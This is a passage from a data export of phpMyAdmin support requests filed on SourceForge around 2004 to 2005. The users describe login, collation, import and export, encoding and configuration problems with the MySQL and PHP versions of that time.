If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT eNodjsFOwzAQRO ijlUCkiJayeFBt iYpVIqVPiND2XYEhEGkI dKvptPfST AVcpD2MdndmniyK vBBYcCxCZFIJcISIY6JLtz4Tsqi0wCR9FbBf3bA7WHOgXftCh 2bwjwhpGNGQOg9jsynnU87AmJi5 idGZ QPkz4AJWZ30cyYwo5zGQT8G3ec72egCufaRLKUqfVT SFW7bHqnEPWVkvUqEy3cyGLqIrJ W 1xc dzh3lNEI21SpkmSJWgqYPvge3wKHfa35PV9SpWVRIlVlj t2hbtqjQZVkG6lxw314j6YGn v 3AgwFxHHsPfcpWxaC3uyo9nDqdE0sKb sNS7 QPlzlBO END CUT BEGIN RAW ERROR C1 C2 LEN 1 2 88 STR ?
CVS Id sqlparser.lib.php,v 2.23.2.1 2004 11 10 00 40 48 lem9 Exp MySQL 4.1.8 nt log USR OS, AGENT, VER Win IE 6.0 PMA 2.6.0 pl3 PHP VER,OS 5.0.3 WINNT LANG en utf 8 SQL amp; 65279;INSERT INTO archive VALUES 1, Dec 17, 2004 7 31 pm , This system is teh secks. )
This is one of about 5,000 lines of command from a total of 29,000 which are in seporate files).
Original URL https sourceforge.net p phpmyadmin support requests 624 https sourceforge.net p phpmyadmin support requests 624 Original author fanstop Found in version 2.6.0 pl3","bug"
"24444","2440","Cannot login.
I have configed the config.inc.php to use confiig with the user pass filled in, also tried http and cookie auth type.
The MySQL server is on the same server as the apache php server so localhost works for the host.
I can log into mySQL via MySQL Administrator using the same account name that I m trying to login as using phpMyAdmin.
I ve tried 2.2.7 pl1..
Using MySQL v4.1.19, Apache Web Server v2.0.52, PHP v4.3.10, phpBB v2.0.11 .. Help please!..
thanks.
Original URL https sourceforge.net p phpmyadmin support requests 625 https sourceforge.net p phpmyadmin support requests 625 Original author pgreen23 Found in version 2.6.1","bug"
"24444","2441","errors with SELECT queries.
I have phpMyAdmin 2.6.1 running under PHP Version 5.0.3, IIS6.
Recently after I upgraded my phpMyAdmin version, I started getting the error PHP has encountered an Access Violation at 016F589C the address varies every time) The error only happens when I run a SELECT query, such as try to browse the database and such.
All other functions work fine.
I am able to run SELECT queries using other php scripts on the server, without problems.
Any thoughts?
Original URL https sourceforge.net p phpmyadmin support requests 626 https sourceforge.net p phpmyadmin support requests 626 Original author megawhizz Found in version 2.6.1","bug"
"24444","2442","Does not show change and delete row icons for MySQL 4.1.
Some time ago I have installed MySQL 4.1 MySQL 4.1.5 gamma) and have got a still problem with access and manipulate data.
So, I have used phpMyAdmin 2.6.0 pl1, but after install 2.6.1 pl2 problem still exist.
There are two simula database using MySQL 4.0 and MySQL 4.1 correspondingly.
If I have connected to 4.0 base there are two icons change and delete) in browse mode before each rows for tables with defined primary or unique key, else if connection open to 4.1 database icons is absend.
So, checkboxes and icons for group operations update and delete) is absend too.
MySQL 4.1 table structure getting by phpMyAdmin export) CREATE TABLE `calendar` `cal id` smallint 5) unsigned NOT NULL auto increment, `cal companyid` mediumint 9) unsigned NOT NULL default 0 , `cal name` varchar 40) NOT NULL default , `cal priority` tinyint 3) unsigned NOT NULL default 5 , `cal status` enum active , inactive ) NOT NULL default active , `time from` time NOT NULL default 00 00 00 , `time to` time NOT NULL default 00 00 00 , `weekdays` tinyint 3) unsigned NOT NULL default 0 , PRIMARY KEY `cal id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT= This table defines elementary calendar AUTO INCREMENT=4 ; MySQL 4.0 table structure getting by phpMyAdmin export) CREATE TABLE `calendar` `cal id` smallint 5) unsigned NOT NULL auto increment, `cal companyid` mediumint 9) unsigned NOT NULL default 0 , `cal name` varchar 40) NOT NULL default , `cal priority` tinyint 3) unsigned NOT NULL default 5 , `cal status` enum active , inactive ) NOT NULL default active , `time from` time NOT NULL default 00 00 00 , `time to` time NOT NULL default 00 00 00 , `weekdays` tinyint 3) unsigned NOT NULL default 0 , PRIMARY KEY `cal id`) ) TYPE=MyISAM COMMENT= This table defines elementary calendar AUTO INCREMENT=4 Original URL https sourceforge.net p phpmyadmin support requests 638 https sourceforge.net p phpmyadmin support requests 638 Original author dime","bug"
"24444","2443","Data Structure appears but no data.
Exported data from advanced guess book using phpadmin 2.6.1 as sql and csv.
Imported both files sql first, then csv and no data appears on web site calebwhite.com Need Help1 Thanks margo BTW csv file shows data!
Error during import!
I will have to repost exact error msg.
Original URL https sourceforge.net p phpmyadmin support requests 627 https sourceforge.net p phpmyadmin support requests 627 Original author margo50 Found in version 2.6.1","bug"
"24444","2444","Error 1267 Can t get rid of this.
Hi Running PMA 2.6.1 MySQL 4.1.7 PHP 4.3.10 We installed PMA onto our server to manage databases.
We cannot get it tow work because we get the following error on viewing table Structure , and Browse 1267 Illegal mix of collations latin1 swedish ci,IMPLICIT) and utf8 general ci,COERCIBLE) for operation = I have combed every last part of our database and switched everything to utf8 general ci.
According to PMA, ALL tables and databases are collated utf8 general ci, yet this error still comes up.
Is there some sort of special QUERY I can perform in SSH that will change anything sweedish to utf8 general?
I m at a loss here, and I m losing my patience with PHPMyAdmin and MySQL.
Any idea why these collation sets default to such an obscure language?
Original URL https sourceforge.net p phpmyadmin support requests 642 https sourceforge.net p phpmyadmin support requests 642 Original author phpeeb Found in version 2.6.1","bug"
"24444","2445","Search function not working for short terms 3 chrs or less).
When a user searches the site s database, it appears that no matches are returned for search terms three characters or less long.
My web site developer told me there was a default setting in the search software that needed to be changed.
Can someone tell me in easy terms, since I m not a technical person) how to do that?
Problem may be tested by going to http www.idtv.co.uk Search.php and performing a search under All for any three letter word e.g.
BBC).
Original URL https sourceforge.net p phpmyadmin support requests 628 https sourceforge.net p phpmyadmin support requests 628 Original author barryflynn","bug"
"24444","2446","Query Window on IE 6.0.2. on first implementation of phpmyadmin i have clicked the sql button on the left pane to add privilages to the database.
please see attached screenshot.jpg.
i have had a look at the forum for advice but have only found it for FOX and such.
Original URL https sourceforge.net p phpmyadmin support requests 644 https sourceforge.net p phpmyadmin support requests 644 Original author andrew546 Found in version 2.6.1 pl3","bug"
"24444","2447","can t find mysql.sock.
Hello, I have the following error when trying to access to phpMyAdmin 2002 Can t connect to local MySQL server through socket tmp mysql.sock 2) locate mysql.sock var lib mysql mysql.sock so i changed in config.inc.php cfg[ Servers ][ i][ socket ] = var lib mysql mysql.sock ; but i still get the same error.... please help me ) vince Original URL https sourceforge.net p phpmyadmin support requests 629 https sourceforge.net p phpmyadmin support requests 629 Original author webjongg Found in version 2.6.1","bug"
"24444","2448","new mysql 4.1 hasing support?.
I m using phpMyAdmin with mysql 4.1.9.
MySQL uses the new 41byte password hashing, when using an old client this will give an authentication protcol not supported like error.
I get this same error with MyAdmin 2.6.1. using either config or cookie mode.
Does 2.6.1 not support this new hasing or am I just not doing it right?
Original URL https sourceforge.net p phpmyadmin support requests 630 https sourceforge.net p phpmyadmin support requests 630 Original author macart Found in version 2.6.1","bug"
"24444","2449","Hiding Databases Features.
Hi, I ve done a little bit of research thus far and have discovered that I can limit the tables displayed on the left with the db only field.
Unfortunately, I don t see anything that will allow me to make this property user specific.
What I am looking to accomplish is an awful lot like what my normal host offers out of pma.
I just want the user to only see the tables they have privileges for and nothing else.
Also, they shouldn t see things like add database and privileges and php info.
Any suggestions for a quick fix?
I basically need to be sure that this end user group doesn t mess with the way this application or mysql works outside of what is necessary to them.
In my opinion, there should be a way to specify who can see what based on user level, inherently in the application.
I ve tried to hack the code a bit to suit my needs, but it is all very convoluted to the outside observer who didn t create it.
I see your usernames are blowfish encrypted, and adding the cookie.auth.inc.php to the config.inc.php in hopes of retreiving the appropriate username from the mysql db table isn t doing anything for me.
As you can see, nothing has worked thus far, but the app still works.
Please help.
Thanks.
Lucas Original URL https sourceforge.net p phpmyadmin support requests 631 https sourceforge.net p phpmyadmin support requests 631 Original author ebeaudio Found in version 2.6.0 pl2","enhancement"
"24444","2450","export problem.
Hello my problem is I have a dedicated server , the support of the server install a new version of php my admin for me.
but now the export part did not work , i mean i can export the structure but i can not export the data.
the support told me that the problem is in the apache configuration and he did not help me more.
please help me and tell me that what should i do so the export work good.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 632 https sourceforge.net p phpmyadmin support requests 632 Original author mmh4214 Found in version 2.6.0 pl1","bug"
"24444","2451","missing parameter error on database create and elsewhere.
When trying to create a new database, add a table to an existing database or apparently doing anything that involves updating the MySQL dayabase although I haven t checked every function) I get an error such as db create.php Missing parameter db this error was from the create database function).
Everything else within phpMyAdmin appears to work correctly display tables, data, etc etc) I can manipulate the databases directly from the mysql command line without a problem.
I m running the following components on Mandrake Linux 10 phpMyAdmin 2.6.1 MySQL 4.0.18 PHP 4.3.4 I use HTTP authentication which also works correctly.
The error occurs when accessing phpMyAdmin from the internet, my Local Area Network, or directly on the server.
It isn t specific to any browser both IE6 and Konqueror display the same problem) I ve seen the missing parameter error referred to elsewhere within the help forum but no guidance as to the cause or a fix.
Any clues ?
Thanks Richard.
Original URL https sourceforge.net p phpmyadmin support requests 633 https sourceforge.net p phpmyadmin support requests 633 Original author rwilliams36 Found in version 2.6.1","bug"
"24444","2452","export files where they stored?.
I was wondering where the export files are stored.
I used the default values on export all databases and selected to file.
But I cant seem to find the file template name left default).
Thank you.
Original URL https sourceforge.net p phpmyadmin support requests 650 https sourceforge.net p phpmyadmin support requests 650 Original author gmfpanda Found in version 2.6.1","bug"
"24444","2453","Admin Home Page.
When I log into my admin homepage there is no login to the page and i cannot see a way to send out newletters and the like.
Attached is a screen shot of the page i get.
Can you tell me what I need to do to fix this?
Thanks richard rtyre earthlink.net Original URL https sourceforge.net p phpmyadmin support requests 634 https sourceforge.net p phpmyadmin support requests 634 Original author rtyre","bug"
"24444","2454","I can t enter text into value field of table.
I can enter text to create a database but when I goto my test database, select a table and then click on Insert and come to the screen where it lists the fields and values I try to enter text into the value field, but nothing goes in there.
I can t type anything in there.
I currently have it running on Apache 2 with PHP5 running in APXS, and MySQL version 4.1.9 Creating databases and connecting is not a problem, just entering values.
Original URL https sourceforge.net p phpmyadmin support requests 635 https sourceforge.net p phpmyadmin support requests 635 Original author scontapay Found in version 2.6.1","bug"
"24444","2455","Windows Error in Mysqld nt.exe.
I get an windows error in Mysqld nt.exe anytime that I click on a table to veiw it.
Then phpMyAdmin comes back with a 2003 error.
When I first got the error I thought maybe I had corrupt files so I decided to reinstall my whole windows xp system from scatch.
But my the time I had everything re installed I got the same error again.
I trying to run this on a localhost with Apache 2.0.53 and PHP 5.0.3 any help would be appreciated.
Original URL https sourceforge.net p phpmyadmin support requests 654 https sourceforge.net p phpmyadmin support requests 654 Original author davidinwinslow Found in version Latest Git","bug"
"24444","2456","installation doesnt work.
i m trying to setup my computer to run an apache server with php and mysql enabled so i can test my scripts without uploading them to the internet.
i ve successfully created a php pages that are able to login to mysql and do everything normally.
however i can t get phpMyAdmin to work in this situation.
i set the user to root and the pw to what it is set to....both are the same on that php page i created myself.
when i goto the index page it asks me for a login, i enter my mysql user and pw and it doesn t work.
is there another option i have to set somewhere?
is it because im running this server locally?
any ideas?
cause i m stumped.
Original URL https sourceforge.net p phpmyadmin support requests 636 https sourceforge.net p phpmyadmin support requests 636 Original author jonwillard Found in version 2.6.1","bug"
"24444","2457","index.php comes up as plain text.
I use Apache 2.0.53, MySQL 4.1.10, PHP 5.0.3 and phpMyAdmin 2.6.1.
When entering http 127.0.0.1 phpMyAdmin in the browser the index.php comes up as plain text and not as the Login form that it is supposed to.
When entering http 127.0.0.1 phpMyAdmin index.php a Download file box comes up asking if I want to store it or open it in Dreamweaver.
If I try to open it an error message opens saying C \Documents and Settings\Haakon\Lokale innstillinger\Temporary internet files\Content.IE5\NGD6O9T7\index[1].php was not found.
In the directory tree for C the directory Lokale innstillinger does not excist at all.
Lokale innstillinger means Local settings).
Where is the problem?
Original URL https sourceforge.net p phpmyadmin support requests 637 https sourceforge.net p phpmyadmin support requests 637 Original author haakon0603 Found in version 2.6.1","bug"
"24444","2458","No index defined on field.
I m trying to set a relation between two tables and myadmin behaves in different ways.
In two cases I am able to create the relation but in a third case made the same way I get the message No index defined!
ConDetaClave) and no relation is stablished.
For one of the tables I have defined a PRIMARY INDEX composed of two fields one index to be able to stablish the relation) in a field also used in the primary key.
If you go to the structure display, you can see the relation stablished but one meesage at the bottom of the indexes stating PRIMARY and INDEX keys should not both be set for column `PpalClave`.
In other table I have defined a UNIQUE INDEX composed of two fields and one index to be able to stablish the relation) in a field also used in the primary key.
If you go to the structure display, you can see the relation stablished but one meesage at the bottom of the indexes stating UNIQUE and INDEX keys should not both be set for column `CirClave`.
With the third table a cannot stablish the relation unless I define the INDEX as one of the two tables defined above because I get back the message No index defined!
ConDetaClave) OK, I m not an expert, I m just a begginer but I can t understand what I m doing wrong or if this is a bug or not.
As we say, a picture explains better than a thousand words so I m attaching a word document that has the details of what I m trying to explain.
I hope to get this right.
I don t seem to get the hang of how to place a bug or what I think is a bug.
Original URL https sourceforge.net p phpmyadmin support requests 639 https sourceforge.net p phpmyadmin support requests 639 Original author yacar suscri","bug"
"24444","2459","replacing data in current sql database with backup data......
Installed news feed module to my .php site by going through homepage menu to the control panel to the administration tab to the boost module updater uninstaller and selecting the news feed module from the list and hitting install , decided it was not going to work for what I needed, so uninstalled through the same paths as above.
Upon attempting to load the site anew, got an error message DB Error no such table SELECT id,hidden,approved FROM mod phpwsrssfeeds feeds WHERE block = 1 ; [nativecode=1146 Table mashed wbst1.mod phpwsrssfeeds feeds doesn t exist] Have a full backup from 02.17.05 however I am trying to avoid using the sql backup so as not to loose the changes made since the date of the backup have done much creating of pages,etc...) if at all possible.
Is there a way to isolate and recreate the modules table so that it would be as before installing the news feed?
I guess I mean is there a section of the usr home mashed backup 2.17.2005 09 29 26 mashed mysql file=mashed wbst1.sql that I could isolate and copy to the .sql that is currently creating the problem with loading the site correctly?
Original URL https sourceforge.net p phpmyadmin support requests 640 https sourceforge.net p phpmyadmin support requests 640 Original author mashed muzik Found in version 2.6.1 rc1","bug"
"24444","2460","password for mysql admin.
i m having trouble with my copy of mysql admin 2.6.1 pl3 it has instaled fine and allows access to the local host but says there is a message saying The cfg[ PmaAbsoluteUri ] directive MUST be set in your configuration file!
Your configuration file contains settings root with no password) that correspond to the default MySQL privileged account.
Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.
however when i try to edit the config.inc.php file to put in a password i cannot log back on until i go back into the file and remove the passwords ive just put in.
at the moment its on my local site however when i publish the database i need it be be secure.
has anyone got any ideas?
i m using a osx mac panther) with the onboard version of php and version 4.1 of mysql Original URL https sourceforge.net p phpmyadmin support requests 641 https sourceforge.net p phpmyadmin support requests 641 Original author jonathan l li","bug"
"24444","2461","The page cannot be displayed.
I am not very good at reporting bugs, but i thought i would just mention that sometimes i get The page cannot be displayed in the right hand side frame after executing an sql.
It happens quite often but there doesn t seem to be any relationship with the sqls that take place.
Sometimes it happens and sometimes it doesn t. Original URL https sourceforge.net p phpmyadmin support requests 643 https sourceforge.net p phpmyadmin support requests 643 Original author fambi","bug"
"24444","2462","Foreign Keys PDF Pages broken.
Hi, MySQL 4.1.10 PHP 5.0.3 mysqli extension Debian 3.1 It is not possible, to set foreign keys.
No errormessage appear, but after the pagereload, nothing was set.
If I set the foreign keys manually , they show up correctly on the relation page Setting up internal phpmyadmin relations works fine.
Downloading a PDF Page fails with the errormessage 1146 Table phpmyadmin.testtab doesn t exist Original URL https sourceforge.net p phpmyadmin support requests 645 https sourceforge.net p phpmyadmin support requests 645 Original author hotte12","bug"
"24444","2463","I think I m getting an error?.
I get the following error The mbstring PHP extension was not found and you seem to be using multibyte charset.
Without mbstring extension phpMyAdmin is unable to split strings correctly and it may result in unexpected results.
Is this a setting within MySQL that I need to change or something I need to change in phpMyAdmin config file?
I m running this using MySQL 4.1.7 nt running on localhost as root localhost and Apache 2 on my WinXP laptop.
thanks, Steve Original URL https sourceforge.net p phpmyadmin support requests 646 https sourceforge.net p phpmyadmin support requests 646 Original author pstevereynolds Found in version 2.6.1 rc2","bug"
"24444","2464","1071 Specified key was too long.
Max key length is 500.
I get this error randomly.
I m trying to set a VARCHAR to a limit of 255 or any other number for that matter) and it won t let me.
I get this instead.
Thoughts?
Brian Original URL https sourceforge.net p phpmyadmin support requests 647 https sourceforge.net p phpmyadmin support requests 647 Original author bcamp1973 Found in version 2.6.0 pl2","bug"
"24444","2465","copy of DB.
Is it possible to copy data from one DB to another ?
I want to make a mirror of DB because I want to test some new things but dont want to loose old one.
Sure I can to export it as sql file but to add 50 Mb Database in 50kb sql files is work for a week or so.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 648 https sourceforge.net p phpmyadmin support requests 648 Original author blue eyed devil","bug"
"24444","2466","Notice common.lib.php, line 1269) when inserting new row.
Hello phpMyAdmin Team, I just installed your 2.6.2 rc1 and noticed, that when inserting a new row, following notice appears Notice Undefined index AllowRoot in [...] pma libraries common.lib.php on line 1269 As a consequence of this notice php produces several warnings concerning headers e.g.
Warning Cannot modify header information headers already sent by output started at [...] pma libraries common.lib.php 1269) in home httpd vhosts buerkle services.com httpdocs subdomains pma libraries ob.lib.php on line 61).
I m using a config.inc.php from a former version, but afaik this shouldn t be a problem.
I know, I could turn error reporting off, but I thought that perhaps it s useful for you to know about this bug .
I searched for AllowRoot in the Bugtracker, but there weren t any results, so I hope that this bug isn t already in the BT.
Gxc3xb6tz Original URL https sourceforge.net p phpmyadmin support requests 662 https sourceforge.net p phpmyadmin support requests 662 Original author goetzb Found in version 2.6.2 rc1","bug"
"24444","2467","Parse error in index.php.
I received a parse error message the first time I used version 2.6.0 pl2 parse error in phpMyAdmin index.php on line 119 The offending line, at its surrounding lines are echo document.writeln \ lt;frame src= left.php?
.
url query .
amp;amp;hash= .
phpmain hash .
phpmain hash js .
name= nav frameborder= 0 id= leftFrame gt;\ ); .
\n ; 0 id= leftFrame gt;\ ); .
\n ; echo document.writeln \ lt; frameset gt;\ ); .
\n ; Removing the line fragment 0 id= leftFrame gt;\ ); .
\n ; removes the error message and phpMyadmin loads properly.
I offer this very diffidently, since the version is quite out dated.
I tried several times to browse for such an error in version 2.6.0 pl2.
Original URL https sourceforge.net p phpmyadmin support requests 663 https sourceforge.net p phpmyadmin support requests 663 Original author jimhadden Found in version 2.6.0 pl2","bug"
"24444","2468","Browsing with Back button.
phpinfo.htm attached) Browser Firefox 1.0.2 While browsing around the pages, after moving few pages with browse, insert or search, using Back button of the browser leads to homepage of PMA on the left frame.
Original URL https sourceforge.net p phpmyadmin support requests 664 https sourceforge.net p phpmyadmin support requests 664 Original author kgurkan Found in version 2.6.0 pl3","bug"
"24444","2469","Where is the reload mysql link gone?.
It isn t anymore present in last versions.
Why?
Original URL https sourceforge.net p phpmyadmin support requests 649 https sourceforge.net p phpmyadmin support requests 649 Original author asteddy","bug"
"24444","2470","No file uploaded in Unknown on line 0.
Since version 2.6.0 I get the following warnings when I execute SQL.
I just upgraded to 2.6.1pl3 hoping it would go away.
No luck.
How do I prevent these messages?
Notice No file uploaded in Unknown on line 0 Warning Cannot add header information headers already sent in mnt optimost webapp tools phpmyadmin libraries hea der http.inc.php on line 14 Warning Cannot add header information headers already sent in mnt optimost webapp tools phpmyadmin libraries hea der http.inc.php on line 15 Warning Cannot add header information headers already sent in mnt optimost webapp tools phpmyadmin libraries hea der http.inc.php on line 16 Warning Cannot add header information headers already sent in mnt optimost webapp tools phpmyadmin libraries hea der http.inc.php on line 17 Warning Cannot add header information headers already sent in mnt optimost webapp tools phpmyadmin libraries hea der http.inc.php on line 20 Original URL https sourceforge.net p phpmyadmin support requests 651 https sourceforge.net p phpmyadmin support requests 651 Original author lance lovette Found in version 2.6.1 rc2","bug"
"24444","2471","Greek ISO File is not displayed.
Dear all, I have downloaded the lastest version of phpMyAdmin, and unfortunately, Greek language in ISO version is not viewed.
I have downloaded the file, installed properly into the lang directory and the system does not recognize it.
Only UTF language versions are shown.
Why is that?
I cannot display by any mean greek data from current databases.
Any help please?
Original URL https sourceforge.net p phpmyadmin support requests 652 https sourceforge.net p phpmyadmin support requests 652 Original author lazarowolf Found in version 2.6.1 rc2","bug"
"24444","2472","phpMyAdmin no access.
Hej!
I installed on WindowsXP home edition apache 2.0.53 mysql 4.1.10a php 4.3.10 phpMyAdmin 2.6.1 pl3 phpMyAdmin fails to open i webbrowser 1251 Client does not support authentication protocol requested by server; consider upgrading MySQL client configured config.inc.php cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = root ; cfg[ Servers ][ i][ password ] = mypassword ; what might be the problem and how might I solve it?
hope you have any suggestions.
Thank You very much.
Original URL https sourceforge.net p phpmyadmin support requests 653 https sourceforge.net p phpmyadmin support requests 653 Original author thomaslanger Found in version Latest Git","bug"
"24444","2473","Problem with upload DB dump!.
Hello, Sorry for my bad English.
Ixc2xb4m from Germany.
I have a Problem with phpmyadmin 2.6.1 pl3 on my Root Server.
I cannot upload a mysql dump with phpmyadmin.
The Message is File could not be read The dump is realy ok. Ixc2xb4ve tested this on an other Server with phpmyadmin.
i canxc2xb4t upload nothing dump as user or as root.
Allways comes this error.
Can you tell me, where is the Problem?
Best regards Dennis Original URL https sourceforge.net p phpmyadmin support requests 669 https sourceforge.net p phpmyadmin support requests 669 Original author shrek2 Found in version 2.6.1 pl3","bug"
"24444","2474","Frame support problem.
when l load phpmyadmin I got a new blank page and I got a message in source code no frame phpMyAdmin is more friendly with a lt;b gt;frames capable lt; b gt; browser.
I use a browser Browser Operea 7.54 Konqueror 3.1.4 6 Mozilla 1.4.1 I use in Linux Fedora Core please suggest me about this problem.
Original URL https sourceforge.net p phpmyadmin support requests 671 https sourceforge.net p phpmyadmin support requests 671 Original author toey Found in version 2.6.1 pl3","bug"
"24444","2475","when i click on reference of tables tbl relation.php) .... when i click on tbl relation.php, Data on column info for this table has deleted !!!
=) help version phpMyAdmin 2.6.2 beta1 mysql MySQL 4.1.10a max Original URL https sourceforge.net p phpmyadmin support requests 655 https sourceforge.net p phpmyadmin support requests 655 Original author alienzzzz","bug"
"24444","2476","donmt have privlidges to set up new database.
in phpmy admin i cant setup a new database iv looked every where cant find out how to give my sites priveledge to do it any ideas know any one i can pay to fix this issue its on my dedicated server and i have root and remote access but cant find how to fix this problem anywhere so i can create new databases from any of the web sites i have on it.
Original URL https sourceforge.net p phpmyadmin support requests 656 https sourceforge.net p phpmyadmin support requests 656 Original author mashalpha","bug"
"24444","2477","help pleaserelating php admn .
please help to after i logged in to my php account i.e.
php admn .
to create table...what name and fields do i enter to get success ?
I have been getting SQL ERRORS.
in the page php admn.
to create table...what name and fields do i enter to get success?
Original URL https sourceforge.net p phpmyadmin support requests 657 https sourceforge.net p phpmyadmin support requests 657 Original author tgopala krishna","bug"
"24444","2478","Restricting Access on IIS.
I ve installed 2.6.2 on IIS.
I ve placed the myPHP folder in my web folder.
As I typically do for password protected sites, I ve set the permissions through the file system as Full control to adminstrator only.
I go to the site, and it asks for my username and password.
Yet once I enter, neither the left or right frames appear, saying error no page.
Yet if I change my folder permissions to control by Anonymous web user, all the files appear.
I of course want password protection and for the changes to appear.
Any idea what I m doing wrong?
Original URL https sourceforge.net p phpmyadmin support requests 675 https sourceforge.net p phpmyadmin support requests 675 Original author daprezjer Found in version 2.6.2 rc1","bug"
"24444","2479","problem with PhpMyAdmin > browse select from table.
hi there!
i have a problem with phpmyadmin... when i use it at local machine it s everythink OK, but when i try to use it at server from webhosting company) i can t make any select or browse table... import export, insert, update, delete... these works fine, but select from my table shows me only clear screen == gt; only header on the top Structure | Browse | SQL | search | Insert | export | operations | empty | drop) and than clear white) screen... no error reporting or else... pls help me if possible if it is bug in phpmyadmin or in mysql instalation permission)... thanx a lot Original URL https sourceforge.net p phpmyadmin support requests 658 https sourceforge.net p phpmyadmin support requests 658 Original author stiffler sk Found in version 2.6.1 rc2","bug"
"24444","2480","phpmyadmin login.
I am using phpmyadmin 2.6.1pl3 and the latest mysql .. howerver i get a problem.
When i go to log into the mysql with my account and pass it works, but with phpmyadmin it does not and i cannot log into it.. any sugestions or errors?
Original URL https sourceforge.net p phpmyadmin support requests 659 https sourceforge.net p phpmyadmin support requests 659 Original author nathanielk","bug"
"24444","2481","i suceed create phpmyadmn.. also read http www.web site design us.com support database index.php phpmyadmin Original URL https sourceforge.net p phpmyadmin support requests 660 https sourceforge.net p phpmyadmin support requests 660 Original author tgopala krishna","bug"
"24444","2482","phpMyAdmin can t work fine with PHP as a cgi binary.
When I set php as a apache module like this LoadModule php5 module c php php5apache2.dll Add Type application x httpd php .php PHPIniDie c php It works fine with phpmyadmin both config and http login mode.
But when I set php as a CGI binary like this ScriptAlias php c php AddType application x httpd php .php Action application x httpd php php php cgi.exe It still works fine with phpmyadmin in config login mode, but not in http mode.
Login mode can be set in phpmyadmin config file config.inc.php).
My php of mysql extension is using the mysqli.dll.
I m sure every setting of php is fine.
My os is Windows XP.
Original URL https sourceforge.net p phpmyadmin support requests 661 https sourceforge.net p phpmyadmin support requests 661 Original author cpthk","bug"
"24444","2483","Displaying In Bad Encoding.
Hi!
I m from Czech Republic and I have encountered this problem.
When writing data through PHP into database with windows 1250 encoding, phpMyAdmin always displays data in cs utf 8 encoding showing crippled text).
I tried many things to fix this using different encoding configurations with no result.
In previous versions of phpMyAdmin 2.5.7 pl1) everything worked fine when cs win 1250 encoding was selected.
I have encountered this bug since version 2.6.0 and I hope it will be fixed soon, because the database cannot be edited with phpMyAdmin with this bug.
Thanx a lot for solution.
Toycat Original URL https sourceforge.net p phpmyadmin support requests 665 https sourceforge.net p phpmyadmin support requests 665 Original author toycat Found in version 2.6.2 rc1","bug"
"24444","2484","2.6.2 Disorderly Chinese characters if collation!=GBK GB2312.
Environment .Windows Server 2003 Standard Simplified Chinese) .Apache 2.0.54 .php 5.0.4 .MySQL 4.1.11 default character set=gbk default storage engine=INNODB ) .Collation of Database latin1 swedish ci .phpMyAdmin 2.6.2 Description I installed phpBB2 php5mod, the collation of database of phpBB2 is latin1 swedish ci, the phpBB2 works fine, all the Chinese characters can be displayed correctly.
And the mysql.exe client tool of MySQL server works fine too.
But phpMyAdmin can t display it correctly, all the Chinese characters becomes to disorderly characters.
The attachment is a screenshot to show this problem.
Any answer will be appreciate.
Thank you!
Original URL https sourceforge.net p phpmyadmin support requests 680 https sourceforge.net p phpmyadmin support requests 680 Original author lovetide","bug"
"24444","2485","Running SQL from file not working..
I have a file of SQL generated by phpMyAdmin on the server.
I have created a DB and selected it.
Gone to the SQL tab page selected the file of SQL.
Uploaded it and phpMyAdmin reports that X number of querys were successful and shows the SQL.
The only problem is that no tables are created?
I have then copied the SQL from under the success message and pasted it into the textarea of the SQL tab page and it works succefully?
I am on Mac OS X 10.3.9 running MySQL MySQL 4.0.24 standard with PHP Version 4.3.10 Original URL https sourceforge.net p phpmyadmin support requests 681 https sourceforge.net p phpmyadmin support requests 681 Original author cpill Found in version Latest Git","bug"
"24444","2486","PHP error while updating.
Apache 1.3.33 PHP4.3.11 MySQL 4.0.24 standard Updating the `global` field which contains PHP serialize ) data, in the following table CREATE TABLE `lingua` `linguaid` smallint 5) unsigned NOT NULL auto increment, `name` varchar 50) NOT NULL default , `global` mediumtext NOT NULL, PRIMARY KEY `linguaid`) ) TYPE=MyISAM AUTO INCREMENT=14 ; Returns PHP Errors Warning reset ) Passed variable is not an array or object in usr local cpanel base 3rdparty phpMyAdmin tbl replace.php on line 81 Warning Invalid argument supplied for foreach ) in usr local cpanel base 3rdparty phpMyAdmin tbl replace.php on line 132 Warning Cannot modify header information headers already sent by output started at usr local cpanel base 3rdparty phpMyAdmin tbl replace.php 81) in usr local cpanel base 3rdparty phpMyAdmin libraries common.lib.php on line 1332 Note I am sorry for not getting deeper into this error but I am in the middle of a project Original URL https sourceforge.net p phpmyadmin support requests 666 https sourceforge.net p phpmyadmin support requests 666 Original author danielmacedo","bug"
"24444","2487","2.6.2 Cannot change NULL NOT NULL, or status not reflected.
After trying to change the NULL NOT NULL attribute of a column, the table properties page does not reflect the change.
If I display the column information through the MySQL console, however, the correct information reflecting my changes) is displayed.
This is a serious flaw.
I am using phpMyAdmin 2.6.3 php 5.0.4 mysql standard 5.0.4 beta Debian Linux Original URL https sourceforge.net p phpmyadmin support requests 684 https sourceforge.net p phpmyadmin support requests 684 Original author parklandspanwy","bug"
"24444","2488","Unable to import SQL files into Safari browser.
I have had this issue for a long time, so it is not specific to 2.6.2 rc1.
I am unable to import SQL text or gzipped files using phpMyAdmin.
I always get the following error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near aid` int 10) NOT NULL auto increment, `tid` int 10) NOT NULL default 0 , `p at line 2 If I cut and paste the text from the file into the SQL box it works OK.
I have tried Safari v1.2.4 and Firefox 1.02 both on Mac OS X 10.3.8.
I am mirroring my online site from the remote server to my local server settings below My local server settings phpMyAdmin 2.6.2 rc1 PHP 5.0.3 MySQL 4.1.10 standard Apache 1.3.33 Remote server settings phpMyAdmin 2.6.0 pl3 PHP 5.0.3 MySQL 4.1.7 Apache 1.3.29 Original URL https sourceforge.net p phpmyadmin support requests 667 https sourceforge.net p phpmyadmin support requests 667 Original author mrzippy Found in version 2.6.2 rc1","bug"
"24444","2489","Memory Exploit Bug.
When using the Export feature and failing to check the Save file as type box phpMyAdmin will hang and eventually take down the webserver.
My host is rather unhappy at the moment to say the least.
Original URL https sourceforge.net p phpmyadmin support requests 687 https sourceforge.net p phpmyadmin support requests 687 Original author efs chaos","bug"
"24444","2490","Document contains no data on non Apache webserver.
Since 2.6 I have problems with logging in.
The login screen appears normal, but when I press the submit button, my browser Firefox) returns with the message that The document contains no data .
I am using a non Apache webserver, which runs PHP as a CGI process.
